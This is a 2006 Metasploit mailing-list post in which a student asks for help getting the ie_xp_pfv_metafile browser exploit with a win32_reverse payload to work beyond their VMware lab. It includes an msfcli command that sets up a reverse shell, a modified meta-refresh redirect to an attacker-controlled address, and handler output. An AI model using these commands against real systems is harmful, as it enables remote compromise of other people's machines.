Metasploit mailing list archives

Framework through lan


From: 2xyofr at gmail.com (2xyo)
Date: Sat, 28 Jan 2006 22:57:55 +0100

Hello,

I test win32_reverse with ie_xp_pfv_metafile exploit in my virtual lan 
with VMWARE and it's run.
But, i couldn't use this exploit without my lan. I don't know how set 
variable for run this.

I haved modify /exploits/ie_xp_pfv_metafile.pm because it redirect to my 
lan adresse et not public adresse
 "<html><header><meta http-equiv='refresh' content='0; 
URL=http://mypublicip${wmfpath}.${ext}&apos;></header><body>".
I haved also forward theses ports in my router.

twoxyo at debian:~/framework-2.5$ ./msfcli ie_xp_pfv_metafile  
LHOST=mypublicip HTTPPORT=8080 LPORT=3300  PAYLOAD=win32_reverse E
[*] The module Msf::Exploit::ie_xp_pfv_metafile does not match the path 
/home/twoxyo/framework-2.5/exploits/original_ie_xp_pfv.metafile.pm
[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.1.106:8080/
[*] HTTP Client connected from 192.168.1.1:1279, redirecting...
[*] HTTP Client connected from 192.168.1.1:1276, sending 1344 bytes of 
payload...

And after i haved nothing.


My lan :

pc tested
   |
   |
Internet
    |
    |
Modem/Router switch
192.168.1.1
    |
    |
Computer on xp pro
192.168.1.100
    |
    |
VMWare
    |________________
    |                                |
    |                                |
Debian                         Xp
192.168.1.106    192.168.1.103


Best regards,
YoYo

P.S : Excuse me for my bad english, i'm french student.





Current thread: